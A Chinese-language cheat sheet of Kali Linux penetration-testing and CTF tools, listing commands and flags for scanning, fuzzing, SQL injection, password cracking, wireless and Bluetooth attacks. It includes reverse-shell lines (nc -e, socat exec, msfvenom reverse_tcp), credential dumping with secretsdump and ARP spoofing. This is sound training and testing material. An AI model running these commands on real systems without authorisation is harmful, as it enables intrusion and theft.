kali渗透测试与CTF常用命令大全
nmap端口扫描与服务识别
所属分类:信息收集 / VoIP / 漏洞分析 / Web
常用命令
bash
nmap -sC -sV -Pn -p- 192.168.56.106
nmap -sU --top-ports 100 192.168.56.106常用参数
bash
-p 22,80,443 # 指定端口
-p- # 扫描全部端口
--top-ports 100 # 扫描常见端口
-Pn # 跳过主机发现
-sC # 默认脚本扫描
-sV # 服务版本识别
-sS # TCP SYN扫描
-sT # TCP全连接扫描
-sU # UDP扫描
-O # 操作系统识别
-A # 综合扫描
--script vuln # 漏洞脚本扫描
--script=http-* # HTTP相关脚本
--open # 只显示开放端口
-n # 不做DNS解析
-v / -vv # 详细输出
-T4 # 加快速度
--min-rate 1000 # 提高最小发包速率
-oN result.txt # 普通文本输出
-oX result.xml # XML输出
-oA scan # 同时输出多种格式Zenmap图形化Nmap前端
所属分类:信息收集
常用命令
bash
zenmap
zenmap -h常用参数
bash
图形界面工具 # Nmap图形化前端WhatWeb网站指纹识别
所属分类:Web
常用命令
bash
whatweb http://192.168.56.106
whatweb -a 3 -v http://192.168.56.106常用参数
bash
-a 1|2|3 # 识别强度
-v # 详细输出
--log-verbose=out.txt # 保存详细结果
--color=never # 关闭颜色
--user-agent UA # 自定义UA
--proxy http://127.0.0.1:8080 # 代理
--follow-redirect=never|always # 是否跟随跳转curlHTTP请求与调试
所属分类:CTF常用补充
常用命令
bash
curl -i http://192.168.56.106
curl -X POST -d 'username=admin&password=admin' http://192.168.56.106/login
curl -k -H 'Host: admin.target.local' https://192.168.56.106/常用参数
bash
-i # 显示响应头
-s # 静默模式
-k # 忽略TLS证书
-L # 跟随跳转
-X POST # 指定请求方法
-d 'a=b' # POST数据
-G # 将 -d 数据拼到URL查询串
-H 'Header: value' # 自定义头
-b cookie.txt # 读取Cookie
-c cookie.txt # 保存Cookie
-u user:pass # Basic认证
-A 'Mozilla/5.0' # 自定义UA
-x http://127.0.0.1:8080 # 代理
-o out.html # 保存响应体
--path-as-is # 保持原始路径
--data-urlencode 'a=b' # URL编码后提交wget下载与镜像
所属分类:CTF常用补充
常用命令
bash
wget http://192.168.56.106/file.txt
wget -r -np -k http://192.168.56.106/常用参数
bash
-O out.txt # 指定输出文件
-c # 断点续传
-r # 递归下载
-np # 不追踪上级目录
-k # 转换本地链接
--mirror # 镜像站点
--no-check-certificate # 忽略证书错误
--user=user --password=pass # 认证
-e robots=off # 忽略robots.txt
-q # 安静模式ffuf模糊测试与目录扫描
所属分类:CTF常用补充
常用命令
bash
ffuf -u http://192.168.56.106/FUZZ -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt -fc 404
ffuf -u http://192.168.56.106/login -X POST -d 'username=admin&password=FUZZ' -w /usr/share/wordlists/rockyou.txt -fs 0
ffuf -u http://FUZZ.target.local -H 'Host: FUZZ.target.local' -w /usr/share/seclists/Discovery/DNS/subdomains-top1million-5000.txt -fs 0常用参数
bash
-u http://target/FUZZ # FUZZ位置
-w wordlist.txt # 字典
-X POST # POST请求
-d 'username=admin&password=FUZZ' # POST数据
-H 'Host: FUZZ.target.com' # Host模糊测试/子域枚举
-H 'X-Forwarded-For: FUZZ' # Header模糊测试
-mc 200,204,301,302,403 # 匹配状态码
-fc 404 # 过滤状态码
-fs 1234 # 过滤响应大小
-fl 10 # 过滤响应行数
-fw 50 # 过滤响应单词数
-ac # 自动校准
-t 50 # 线程数
-recursion # 递归扫描
-recursion-depth 2 # 递归深度
-rate 100 # 限速
-p 0.1 # 请求延迟
-x http://127.0.0.1:8080 # 代理
-o output.json # 输出文件
-of json # 输出格式wfuzz参数模糊测试与目录爆破
所属分类:模糊测试 / Web
常用命令
bash
wfuzz -c -z file,/usr/share/seclists/Discovery/Web-Content/common.txt --hc 404 http://192.168.56.106/FUZZ
wfuzz -c -z file,/usr/share/wordlists/rockyou.txt -d 'username=admin&password=FUZZ' --hs 'invalid' http://192.168.56.106/login常用参数
bash
-z file,wordlist.txt # 指定payload字典
-u http://target/FUZZ # FUZZ位置
-d 'a=1&b=FUZZ' # POST数据
-H 'Header: FUZZ' # 自定义头模糊测试
--sc 200 # 只显示状态码
--hc 404 # 隐藏状态码
--ss 'welcome' # 显示包含指定字符串的响应
--hs 'invalid' # 隐藏包含指定字符串的响应
--hl 10 # 隐藏指定行数响应
--hw 20 # 隐藏指定单词数响应
--hh 1234 # 隐藏指定字节数响应
-c # 彩色输出
-t 50 # 线程数
-p 127.0.0.1:8080:HTTP # 代理
--basic user:pass # Basic认证gobuster目录与虚拟主机扫描
所属分类:CTF常用补充
常用命令
bash
gobuster dir -u http://192.168.56.106 -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt -x php,html,js,txt -b 404
gobuster vhost -u http://192.168.56.106 -w /usr/share/seclists/Discovery/DNS/subdomains-top1million-5000.txt --append-domain
gobuster dns -d target.local -w /usr/share/seclists/Discovery/DNS/subdomains-top1million-5000.txt常用参数
bash
dir # 目录模式
vhost # 虚拟主机模式
dns # DNS模式
-u http://target.com # 目标URL
-w wordlist.txt # 字典
-x php,txt,html,zip # 扩展名
-t 50 # 线程数
-k # 忽略TLS证书错误
-b 403,404 # 忽略状态码
-s 200,204,301,302,403 # 仅显示指定状态码
--wildcard # 处理泛解析/泛响应
--append-domain # 自动拼接域名
-o output.txt # 输出文件
-H 'Host: test.local' # 自定义Host头feroxbuster目录递归扫描
所属分类:CTF常用补充
常用命令
bash
feroxbuster -u http://192.168.56.106 -w /usr/share/seclists/Discovery/Web-Content/common.txt -x php,txt,html -k
feroxbuster -u https://target.com -w /usr/share/seclists/Discovery/Web-Content/raft-medium-directories.txt --depth 2 --extract-links常用参数
bash
-u http://target.com # 目标URL
-w wordlist.txt # 字典
-x php,html,txt,zip # 扩展名
-k # 忽略TLS证书错误
-t 50 # 线程数
--depth 2 # 递归深度
--extract-links # 提取页面链接
--filter-status 404 # 过滤状态码
--filter-size 1234 # 过滤响应大小
--scan-limit 10 # 并发扫描限制
--rate-limit 50 # 请求速率限制
--proxy http://127.0.0.1:8080 # 代理
-H 'Header: value' # 自定义头
-C cookie=value # 自定义Cookie
-o output.txt # 输出文件DIRB目录扫描
所属分类:Web
常用命令
bash
dirb http://192.168.56.106 /usr/share/wordlists/dirb/common.txt
dirb http://192.168.56.106 /usr/share/wordlists/dirb/common.txt -X .php,.txt,.zip常用参数
bash
-X .php,.txt,.zip # 扩展名
-N 404 # 忽略状态码
-a 'Mozilla/5.0' # 自定义UA
-c cookie=value # 自定义Cookie
-H 'Header: value' # 自定义请求头
-p http://127.0.0.1:8080 # 代理
-r # 不递归
-S # 静默模式
-o output.txt # 输出文件DirBuster目录扫描
所属分类:Web
常用命令
bash
dirbuster
java -jar /usr/share/dirbuster/DirBuster.jar常用参数
bash
图形界面工具 # 设置URL、字典、线程Burp Suite代理与重放
所属分类:Web
常用命令
bash
burpsuite
java -jar burpsuite.jar常用参数
bash
Proxy # 代理抓包
Repeater # 重放改包
Intruder # 爆破/批量测试
Decoder # 编解码
Comparer # 请求响应对比
Extender # 插件管理
Logger / HTTP history # 历史流量查看
默认代理 127.0.0.1:8080 # 浏览器代理
Project options # 证书/超时/重定向
Target scope # 设置站点范围sqlmapSQL注入测试
所属分类:数据库 / 利用 / Web
常用命令
bash
sqlmap -u 'http://192.168.56.106/item.php?id=1' --batch --dbs
sqlmap -r request.txt --batch --dump常用参数
bash
-u URL # 指定目标URL
-r request.txt # 从Burp请求文件读取
-p id # 指定测试参数
--data='a=1&b=2' # POST数据
--cookie='k=v' # 自定义Cookie
--batch # 自动确认
--dbs # 列数据库
--tables # 列表
--columns # 列字段
--dump # 导出数据
--current-user # 当前数据库用户
--current-db # 当前数据库名
--risk 3 --level 5 # 提高测试强度
--threads 10 # 线程数
--random-agent # 随机UA
--proxy=http://127.0.0.1:8080 # 代理
--tamper=space2comment # 使用tamper脚本
--forms # 自动解析表单
--os-shell # 尝试获取系统shell
--flush-session # 清除缓存重测Nikto Web漏洞扫描
所属分类:漏洞分析 / Web
常用命令
bash
nikto -h http://192.168.56.106
nikto -h http://192.168.56.106 -o report.html -Format html常用参数
bash
-h URL # 目标
-p 80,443 # 指定端口
-ssl # 强制HTTPS
-Tuning x # 指定测试类别
-id user:pass # Basic认证
-useproxy http://127.0.0.1:8080 # 代理
-nointeractive # 非交互模式
-Format html|txt|csv # 输出格式
-o report.html # 输出文件
-Display V # 详细显示WPScan WordPress扫描
所属分类:Web
常用命令
bash
wpscan --url http://192.168.56.106 --enumerate u,p,t
wpscan --url http://192.168.56.106 --api-token YOUR_TOKEN常用参数
bash
--url URL # 目标URL
--enumerate u,p,t,tt # 枚举用户/插件/主题/主题版本
--api-token YOUR_TOKEN # 漏洞数据库API
--plugins-detection mixed # 插件检测方式
--random-user-agent # 随机UA
--disable-tls-checks # 忽略TLS问题
--proxy http://127.0.0.1:8080 # 代理
--usernames admin # 指定用户名
--passwords rockyou.txt # 密码字典
--force # 强制扫描非典型站点
--rua # 随机UA简写blue-hydra图形化工具
所属分类:Bluetooth蓝牙
常用命令
bash
blue-hydra常用参数
bash
--help # 查看帮助
图形/交互式工具 # 以启动后菜单/界面为主Hydra多协议爆破
所属分类:密码攻击 / Web
常用命令
bash
hydra -L users.txt -P /usr/share/wordlists/rockyou.txt ssh://192.168.56.106
hydra -l admin -P /usr/share/wordlists/rockyou.txt 192.168.56.106 http-post-form '/login:username=^USER^&password=^PASS^:F=invalid'常用参数
bash
-l admin # 单用户名
-L users.txt # 用户名字典
-p 123456 # 单密码
-P rockyou.txt # 密码字典
-s 22 # 指定端口
-t 16 # 线程数
-f # 成功后停止
-V # 详细输出
-I # 忽略恢复文件
-u # 先变换用户再变换密码
-o hydra.txt # 输出文件
http-get-form # HTTP GET表单模式
http-post-form # HTTP POST表单模式
ssh://host # SSH目标写法
ftp://host # FTP目标写法John the Ripper密码破解
所属分类:密码攻击
常用命令
bash
john hash.txt --wordlist=/usr/share/wordlists/rockyou.txt
john --show hash.txt常用参数
bash
--wordlist=file # 字典模式
--format=raw-md5 # 指定哈希格式
--rules # 启用规则变形
--incremental # 增量爆破
--fork=4 # 多进程
--session=name # 保存会话名
--restore=name # 恢复会话
--show # 显示结果
--single # 单词变形模式
--stdout # 仅输出候选口令hashcatGPU密码破解
所属分类:802.11无线攻击 / 密码攻击
常用命令
bash
hashcat -m 0 -a 0 hash.txt /usr/share/wordlists/rockyou.txt
hashcat -m 1000 -a 3 hash.txt ?a?a?a?a?a?a常用参数
bash
-m 0 # 哈希模式,例如 MD5
-m 1000 # NTLM模式
-a 0 # 字典攻击
-a 3 # 掩码攻击
-a 6 / -a 7 # 混合攻击
-o found.txt # 输出文件
--outfile-format 2 # 输出格式
-r rules/best64.rule # 规则文件
--username # 哈希前带用户名
--show # 显示结果
--restore # 恢复会话
--session crack1 # 会话名
-O # 优化内核
-w 3 # 工作负载
--force # 强制运行hashcat-utils字典处理
所属分类:密码攻击
常用命令
bash
cutb -f 1 wordlist.txt > left.txt
combinator.bin left.txt right.txt > combo.txt常用参数
bash
组合、切分、掩码辅助工具 # 与hashcat联动使用crunch自定义密码字典生成
所属分类:密码攻击
常用命令
bash
crunch 6 6 0123456789 -o digits6.txt
crunch 4 4 abc123 -t @@%% -o custom.txt常用参数
bash
6 8 # 最小/最大长度
-t pass@@@ # 指定掩码模板
-o wordlist.txt # 输出文件
-f charset.lst mixalpha # 使用字符集配置
-d 2@ # 限制重复字符
-s abc123 # 起始字符串
-e zzz999 # 结束字符串
-p a b c # 排列模式
-q file.txt # 从文件排列
-z gzip # 压缩输出cewl网页爬取生成字典
所属分类:密码攻击
常用命令
bash
cewl http://192.168.56.106 -w words.txt
cewl -d 2 -m 5 http://192.168.56.106 -w words.txt常用参数
bash
-d 2 # 爬取深度
-m 5 # 最小单词长度
-w words.txt # 输出文件
-e # 提取邮箱
--email_file emails.txt # 邮箱输出
-a # 包含元信息
-v # 详细输出
-u user -p pass # Basic认证
--with-numbers # 包含数字词
--offsite # 跟随站外链接searchsploit漏洞库查询
所属分类:CTF常用补充
常用命令
bash
searchsploit smb 4.10
searchsploit -m 48537常用参数
bash
-t # 仅搜索标题
-p # 显示本地Exploit-DB路径
-m ID # 复制PoC到当前目录
-x ID # 查看PoC内容
--nmap scan.xml # 导入Nmap结果
-j / --json # JSON输出
-u # 更新数据库
-w # 输出Web链接metasploit-framework漏洞利用框架
所属分类:利用 / 逆向
常用命令
bash
msfconsole
msfvenom -p windows/x64/meterpreter/reverse_tcp LHOST=192.168.56.1 LPORT=4444 -f exe -o shell.exe
msfvenom -p linux/x64/shell_reverse_tcp LHOST=192.168.56.1 LPORT=4444 -f elf -o shell.elf常用参数
bash
msfconsole # 启动框架
search smb # 搜索模块
use exploit/... # 选择模块
show options # 查看参数
set RHOSTS 192.168.56.106 # 设置目标
set LHOST 192.168.56.1 # 设置回连地址
set PAYLOAD ... # 设置载荷
check # 漏洞检查
run / exploit # 运行模块
sessions -i 1 # 进入会话
background # 会话后台
-p payload # msfvenom载荷
-f exe|elf|raw # msfvenom输出格式
-o shell.exe # 输出文件msfpc快速生成Metasploit木马
所属分类:利用 / 社工
常用命令
bash
msfpc windows 192.168.56.1 4444
msfpc linux 192.168.56.1 4444 elf常用参数
bash
LPORT # 回连端口
windows|linux|android # 目标平台
LHOST # 回连地址
elf|exe|apk # 输出格式responderLLMNR/NBNS欺骗
所属分类:嗅探欺骗
常用命令
bash
responder -I eth0
responder -I eth0 -dwv常用参数
bash
-I eth0 # 指定网卡
-w # 启用WPAD
-d # DHCP相关响应
-v # 详细输出
-A # 分析模式,不投毒
-F # 指纹识别
-r # 启用NBT-NS响应
-f # 强制某些服务开启bettercap中间人与网络劫持
所属分类:嗅探欺骗
常用命令
bash
bettercap -iface eth0
bettercap -caplet http-ui常用参数
bash
-iface eth0 # 指定网卡
-caplet file # 载入caplet
-eval 'help' # 启动时执行命令
net.probe on # 主机探测
set arp.spoof.targets ... # 设置ARP目标
arp.spoof on # ARP欺骗
net.sniff on # 抓包
http.proxy on # HTTP代理
http-ui # 启动Web UI caplet
help # 查看命令tcpdump抓包
所属分类:取证
常用命令
bash
tcpdump -i eth0 -nn
tcpdump -i eth0 host 192.168.56.106 and port 80 -w capture.pcap
tcpdump -i eth0 -nn -A 'tcp port 80'常用参数
bash
-i eth0 # 指定网卡
-nn # 不解析主机名和端口名
-s 0 # 抓完整数据包
-c 100 # 抓指定数量后停止
-A # 以ASCII显示载荷
-X # 以HEX+ASCII显示
-r capture.pcap # 读取pcap
-w capture.pcap # 保存为pcap
host 1.1.1.1 # 按主机过滤
net 192.168.56.0/24 # 按网段过滤
port 80 # 按端口过滤
tcp / udp / icmp # 按协议过滤wireshark图形化抓包分析
所属分类:取证 / 嗅探欺骗 / VoIP / Web
常用命令
bash
wireshark
tshark -i eth0 -Y http常用参数
bash
-i eth0 # 指定接口启动抓包
-k # 立即开始抓包
-r capture.pcap # 打开pcap文件
-Y 'http' # 显示过滤器
Capture Options # 抓包接口/长度/环形缓冲
Follow TCP Stream # 跟踪会话流
Statistics # 协议/会话统计
Export Objects # 导出HTTP/SMB对象smbclient访问SMB共享
所属分类:CTF常用补充
常用命令
bash
smbclient -L //192.168.56.106 -N
smbclient //192.168.56.106/share -U user常用参数
bash
-L //host # 列出共享
-U user # 指定用户名
-N # 空密码/匿名
-c 'ls' # 直接执行命令
-p 445 # 指定端口
-m SMB3 # 指定协议版本
-W WORKGROUP # 指定域/工作组
//host/share # 连接共享路径
命令: ls/get/put/mget/mput # 交互常用命令enum4linuxSMB信息枚举
所属分类:信息收集
常用命令
bash
enum4linux -a 192.168.56.106
enum4linux -U -S -P 192.168.56.106常用参数
bash
-a # 全量枚举
-U # 用户枚举
-S # 共享枚举
-P # 策略枚举
-G # 组枚举
-o # OS信息
-r # RID循环枚举
-u user -p pass # 指定凭据
-v # 详细输出rpcclientRPC枚举
所属分类:CTF常用补充
常用命令
bash
rpcclient -U '' -N 192.168.56.106
rpcclient -U user%pass 192.168.56.106常用参数
bash
-U user%pass # 指定用户凭据
-N # 空密码
-c 'enumdomusers' # 执行单条RPC命令
-W DOMAIN # 指定域
-c 'srvinfo' # 服务器信息
enumdomusers # 枚举域用户
enumdomgroups # 枚举域组
queryuser RID # 查询用户
lookupnames name # 名称转SID
netshareenum # 枚举共享impacket-scripts远程执行与协议利用
所属分类:应急响应
常用命令
bash
psexec.py user:pass@192.168.56.106
secretsdump.py -just-dc user:pass@192.168.56.106常用参数
bash
psexec.py # SMB远程执行
wmiexec.py # WMI远程执行
smbexec.py # SMB半交互执行
secretsdump.py # 导出hash/LSA/NTDS
GetUserSPNs.py # Kerberoasting
lookupsid.py # SID枚举
-hashes LM:NT # 传入NTLM哈希
-no-pass # 不提示密码
-k # Kerberos认证
-dc-ip 192.168.56.10 # 指定域控
-just-dc # 仅导出域控核心数据ssh远程登录与端口转发
所属分类:CTF常用补充
常用命令
bash
ssh user@192.168.56.106
ssh -L 8080:127.0.0.1:80 user@192.168.56.106
ssh -D 1080 -N user@192.168.56.106常用参数
bash
-i id_rsa # 私钥
-p 2222 # 指定端口
-L 8080:127.0.0.1:80 # 本地端口转发
-R 8080:127.0.0.1:80 # 远程端口转发
-D 1080 # SOCKS代理
-N # 不执行远程命令
-f # 后台运行
-o StrictHostKeyChecking=no # 跳过首次确认
-J jump@host # 跳板机
-A # 转发ssh-agenttftpd32资源包与常用路径
所属分类:Windows资源
常用命令
bash
ls /usr/share/windows-resources
find /usr/share/windows-resources -type f | head常用参数
bash
/usr/share/windows-resources # 常用资源路径
适合与其他工具联动使用 # 该包本身可能没有统一主命令ftp文件传输与匿名检查
所属分类:CTF常用补充
常用命令
bash
ftp 192.168.56.106
lftp -u anonymous,anonymous 192.168.56.106常用参数
bash
-p 21 # 指定端口
user anonymous # 匿名登录
ls / dir # 列目录
get file # 下载文件
put file # 上传文件
mget *.txt # 批量下载
binary / ascii # 传输模式
passive # 被动模式
prompt # 批量传输时取消确认ncNetcat连接与反弹
所属分类:CTF常用补充
常用命令
bash
nc -lvnp 4444
nc 192.168.56.1 4444 -e /bin/bash
nc -zv 192.168.56.106 1-1000常用参数
bash
-l # 监听模式
-v # 详细输出
-n # 不做DNS解析
-p 4444 # 指定端口
-e /bin/bash # 执行程序
-u # UDP模式
-k # 保持监听
-w 3 # 超时
-z # 仅扫描不发送数据ncat增强版Netcat
所属分类:信息收集
常用命令
bash
ncat -lvnp 4444
ncat --ssl 192.168.56.106 443常用参数
bash
-l # 监听模式
-v # 详细输出
-n # 不做DNS解析
-p 4444 # 指定端口
--ssl # SSL/TLS模式
--sh-exec 'bash -li' # 执行shell
--proxy 127.0.0.1:8080 # 代理
--proxy-type http|socks4|socks5 # 代理类型
-u # UDP模式
-k # 保持监听ncat-w32资源包与常用路径
所属分类:Windows资源
常用命令
bash
ls /usr/share/windows-resources
find /usr/share/windows-resources -type f | head常用参数
bash
/usr/share/windows-resources # 常用资源路径
适合与其他工具联动使用 # 该包本身可能没有统一主命令netcat-traditional传统nc
所属分类:CTF常用补充
常用命令
bash
nc.traditional -lvnp 4444
nc.traditional 192.168.56.1 4444 -e /bin/sh常用参数
bash
-e /bin/sh # 传统版本常见用法socat高级端口转发与反弹
所属分类:CTF常用补充
常用命令
bash
socat TCP-LISTEN:4444,reuseaddr,fork TCP:192.168.56.106:80
socat exec:'bash -li',pty,stderr,setsid,sigint,sane tcp:192.168.56.1:4444常用参数
bash
TCP-LISTEN:4444 # TCP监听
UDP-LISTEN:4444 # UDP监听
TCP:host:port # TCP连接
EXEC:'bash -li' # 执行程序
FILE:/tmp/fifo # 文件/管道
pty # 分配伪终端
fork # 多连接
reuseaddr # 复用地址
stderr # 重定向标准错误
setsid # 新会话
sigint # 处理 Ctrl+C
sane # 修复终端
SOCKS4A:127.0.0.1:host:port,socksport=9050 # 走SOCKS代理onesixtyoneSNMP团体字爆破
所属分类:信息收集 / 密码攻击
常用命令
bash
onesixtyone 192.168.56.106 -c /usr/share/doc/onesixtyone/dict.txt
onesixtyone -i hosts.txt -c community.txt常用参数
bash
-c community.txt # 团体字典
-i targets.txt # 目标列表
-p 161 # 指定端口
-w 10 # 超时
-d # 调试输出
-o result.txt # 输出结果aircrack-ng无线抓包与破解
所属分类:802.11无线攻击
常用命令
bash
airmon-ng start wlan0
airodump-ng wlan0mon
aircrack-ng capture.cap -w /usr/share/wordlists/rockyou.txt常用参数
bash
airmon-ng start wlan0 # 开启监听模式
airodump-ng wlan0mon # 抓包
aireplay-ng -0 5 ... # 去认证攻击
aircrack-ng capture.cap # 破解握手包
--bssid XX:XX:XX:XX:XX:XX # 指定AP
-c 6 # 指定信道
-w rockyou.txt # 指定字典
--ignore-negative-one # 驱动兼容问题时使用
--ivs # 仅抓IV数据
-0 5 # 发送5次deauthairgeddon无线攻击工具常用命令
所属分类:802.11无线攻击
常用命令
bash
airgeddon --help常用参数
bash
--help # 查看帮助
man tool # 查看手册asleap无线攻击工具常用命令
所属分类:802.11无线攻击
常用命令
bash
asleap --help常用参数
bash
--help # 查看帮助
man tool # 查看手册bullyWPS爆破
所属分类:802.11无线攻击
常用命令
bash
bully wlan0mon -b 00:11:22:33:44:55
bully wlan0mon -b 00:11:22:33:44:55 -c 6 -v 3常用参数
bash
-b BSSID # 目标AP
-c 6 # 信道
-e ESSID # 指定ESSID
-v 3 # 详细级别
-p 12345670 # 指定PIN
-d 2 # 延时
-t 5 # 超时
--bruteforce # 暴力尝试PINcowpatty无线攻击工具常用命令
所属分类:802.11无线攻击
常用命令
bash
cowpatty --help常用参数
bash
--help # 查看帮助
man tool # 查看手册eapmd5pass无线攻击工具常用命令
所属分类:802.11无线攻击
常用命令
bash
eapmd5pass --help常用参数
bash
--help # 查看帮助
man tool # 查看手册fern-wifi-cracker图形化工具
所属分类:802.11无线攻击
常用命令
bash
fern-wifi-cracker常用参数
bash
--help # 查看帮助
图形/交互式工具 # 以启动后菜单/界面为主freeradius-wpe无线攻击工具常用命令
所属分类:802.11无线攻击
常用命令
bash
freeradius-wpe --help常用参数
bash
--help # 查看帮助
man tool # 查看手册hostapd-wpe无线攻击工具常用命令
所属分类:802.11无线攻击
常用命令
bash
hostapd-wpe --help常用参数
bash
--help # 查看帮助
man tool # 查看手册iw无线攻击工具常用命令
所属分类:802.11无线攻击
常用命令
bash
iw --help常用参数
bash
--help # 查看帮助
man tool # 查看手册kismet无线探测
所属分类:802.11无线攻击
常用命令
bash
kismet
kismet -c wlan0mon常用参数
bash
-c wlan0mon # 指定监听接口
--no-ncurses # 无终端界面
--daemonize # 后台运行
--debug # 调试输出
Web UI # 浏览器查看结果
日志输出 # 保存抓包与探测日志macchanger无线攻击工具常用命令
所属分类:802.11无线攻击 / 嗅探欺骗
常用命令
bash
macchanger --help常用参数
bash
-r # 随机MAC
-a # 随机同厂商MAC
-p # 恢复原MAC
-m 00:11:22:33:44:55 # 指定MAC
-s # 查看当前MAC
interface wlan0 # 目标网卡mdk3无线攻击工具常用命令
所属分类:802.11无线攻击
常用命令
bash
mdk3 --help常用参数
bash
--help # 查看帮助
man tool # 查看手册mdk4无线攻击工具常用命令
所属分类:802.11无线攻击
常用命令
bash
mdk4 --help常用参数
bash
--help # 查看帮助
man tool # 查看手册pixiewps离线WPS破解
所属分类:802.11无线攻击
常用命令
bash
pixiewps -e PKE -r PKR -s E-Hash1 -z E-Hash2 -a AuthKey -n E-Nonce常用参数
bash
-a AuthKey # 认证密钥
-e / -r / -s / -z # 从reaver/bully拿到的参数
-n E-Nonce # 随机数reaverWPS爆破
所属分类:802.11无线攻击
常用命令
bash
reaver -i wlan0mon -b 00:11:22:33:44:55 -vv
reaver -i wlan0mon -b 00:11:22:33:44:55 -c 6 -K 1常用参数
bash
-i wlan0mon # 无线接口
-b BSSID # 目标AP
-c 6 # 信道
-vv # 详细输出
-K 1 # Pixie Dust模式
-p 12345670 # 指定PIN
-d 2 # 延时
-t 5 # 超时
-r 3:15 # 重试/等待策略
-N # 不尝试关联固定设置wifi-honey无线攻击工具常用命令
所属分类:802.11无线攻击 / 嗅探欺骗
常用命令
bash
wifi-honey --help常用参数
bash
--help # 查看帮助
man tool # 查看手册wifite自动化无线攻击
所属分类:802.11无线攻击
常用命令
bash
wifite
wifite --wps --dict /usr/share/wordlists/rockyou.txt常用参数
bash
-i wlan0mon # 指定接口
--wps # 优先WPS攻击
--wep # 启用WEP攻击
--pmkid # PMKID攻击
--dict rockyou.txt # 指定字典
--kill # 杀掉干扰进程
--skip-crack # 只抓握手不破解
--handshake # 只抓握手
--mac # 显示目标MAC
--timeout 60 # 超时bluelog图形化工具
所属分类:Bluetooth蓝牙
常用命令
bash
bluelog常用参数
bash
--help # 查看帮助
图形/交互式工具 # 以启动后菜单/界面为主blueranger蓝牙工具常用命令
所属分类:Bluetooth蓝牙
常用命令
bash
blueranger --help常用参数
bash
--help # 查看帮助
man tool # 查看手册bluesnarfer蓝牙数据窃取
所属分类:Bluetooth蓝牙
常用命令
bash
bluesnarfer -b 00:11:22:33:44:55 -C 1-10常用参数
bash
-b MAC # 目标蓝牙MAC
-C 1-10 # 读取联系人范围bluez蓝牙基础工具
所属分类:Bluetooth蓝牙
常用命令
bash
bluetoothctl scan on
hcitool scan常用参数
bash
hciconfig # 查看蓝牙接口
bluetoothctl # 蓝牙控制台
hcitool scan # 扫描设备bluez-hcidump蓝牙工具常用命令
所属分类:Bluetooth蓝牙
常用命令
bash
bluez-hcidump --help常用参数
bash
--help # 查看帮助
man tool # 查看手册btscanner蓝牙扫描
所属分类:Bluetooth蓝牙
常用命令
bash
btscanner
hcitool scan常用参数
bash
图形界面/命令行结合 # 扫描蓝牙设备与服务crackle蓝牙工具常用命令
所属分类:Bluetooth蓝牙 / 密码攻击
常用命令
bash
crackle --help常用参数
bash
--help # 查看帮助
man tool # 查看手册redfang蓝牙工具常用命令
所属分类:Bluetooth蓝牙
常用命令
bash
redfang --help常用参数
bash
--help # 查看帮助
man tool # 查看手册spooftooph蓝牙工具常用命令
所属分类:Bluetooth蓝牙
常用命令
bash
spooftooph --help常用参数
bash
--help # 查看帮助
man tool # 查看手册ubertooth蓝牙工具常用命令
所属分类:Bluetooth蓝牙
常用命令
bash
ubertooth --help常用参数
bash
--help # 查看帮助
man tool # 查看手册aesfix隐写/密码工具常用命令
所属分类:密码学与隐写
常用命令
bash
aesfix --help常用参数
bash
--help # 查看帮助
man tool # 查看手册aeskeyfind隐写/密码工具常用命令
所属分类:密码学与隐写
常用命令
bash
aeskeyfind --help常用参数
bash
--help # 查看帮助
man tool # 查看手册ccrypt隐写/密码工具常用命令
所属分类:密码学与隐写
常用命令
bash
ccrypt --help常用参数
bash
--help # 查看帮助
man tool # 查看手册steghide图片隐写提取
所属分类:密码学与隐写
常用命令
bash
steghide extract -sf secret.jpg
steghide embed -cf cover.jpg -ef shell.txt -sf out.jpg常用参数
bash
extract # 提取隐藏数据
embed # 嵌入数据
-sf secret.jpg # 隐写文件
-cf cover.jpg # 载体文件
-ef shell.txt # 待嵌入文件
-xf out.txt # 指定提取输出文件
-p password # 密码
-info file.jpg # 查看是否可提取stegosuite图形化隐写
所属分类:密码学与隐写
常用命令
bash
stegosuite
java -jar /usr/share/stegosuite/stegosuite.jar常用参数
bash
图形界面工具 # 常用于图片隐写与提取stegsnow文本空白隐写
所属分类:密码学与隐写
常用命令
bash
stegsnow -C secret.txt
stegsnow -f payload.txt cover.txt out.txt常用参数
bash
-C secret.txt # 提取数据
-f payload.txt # 嵌入数据jSQLInjection图形化SQL注入
所属分类:数据库 / Web
常用命令
bash
jsql
java -jar /usr/share/jsql-injection/jsql-injection.jar常用参数
bash
图形界面工具 # 适合手工SQL注入测试mdbtools数据库工具常用命令
所属分类:数据库
常用命令
bash
mdbtools --help常用参数
bash
--help # 查看帮助
man tool # 查看手册oscannerOracle扫描
所属分类:数据库 / Web
常用命令
bash
oscanner -s 192.168.56.106
oscanner -s 192.168.56.106 -P 1521常用参数
bash
-P 1521 # 端口
-s host # 目标主机sidguesserOracle SID枚举
所属分类:数据库 / Web
常用命令
bash
sidguesser 192.168.56.106 1521 sid.txt
sidguesser 192.168.56.106 1521常用参数
bash
host port [dict] # 目标与SID字典sqldict数据库工具常用命令
所属分类:数据库 / 密码攻击 / Web
常用命令
bash
sqldict --help常用参数
bash
--help # 查看帮助
man tool # 查看手册sqlitebrowserSQLite图形查看
所属分类:数据库 / 取证 / Web
常用命令
bash
sqlitebrowser database.db
sqlite3 database.db '.tables'常用参数
bash
图形界面工具 # 查看和编辑SQLite数据库sqlninjaMicrosoft SQL利用
所属分类:数据库 / Web
常用命令
bash
sqlninja -m t -f sqlninja.conf
sqlninja -m b -f sqlninja.conf常用参数
bash
-f sqlninja.conf # 配置文件
-m t # 测试模式
-m b # 暴力/获取shell相关模式
-m s # 提升权限/系统级动作
-v # 详细输出
--resume # 恢复已有会话sqlsusMySQL注入利用
所属分类:数据库 / Web
常用命令
bash
sqlsus ./sqlsus.conf
sqlsus -s常用参数
bash
./sqlsus.conf # 配置文件
-s # 启动交互
-v # 详细输出
-r # 恢复会话
-l # 列出会话/日志tnscmd10gOracle TNS枚举
所属分类:数据库 / Web
常用命令
bash
tnscmd10g version -h 192.168.56.106 -p 1521
tnscmd10g status -h 192.168.56.106 -p 1521常用参数
bash
version # 查看版本
status # 查看状态
ping # 探测服务
services # 枚举服务
-h host # 目标主机
-p 1521 # 端口Armitage图形化Metasploit前端
所属分类:利用
常用命令
bash
armitage常用参数
bash
图形界面工具 # Metasploit协作前端BeEF浏览器利用框架
所属分类:利用 / 社工 / Web
常用命令
bash
beef-xss
/usr/share/beef-xss/beef常用参数
bash
默认Web界面 # 浏览器钩子与社工利用exploitdb漏洞库查询
所属分类:利用 / 识别
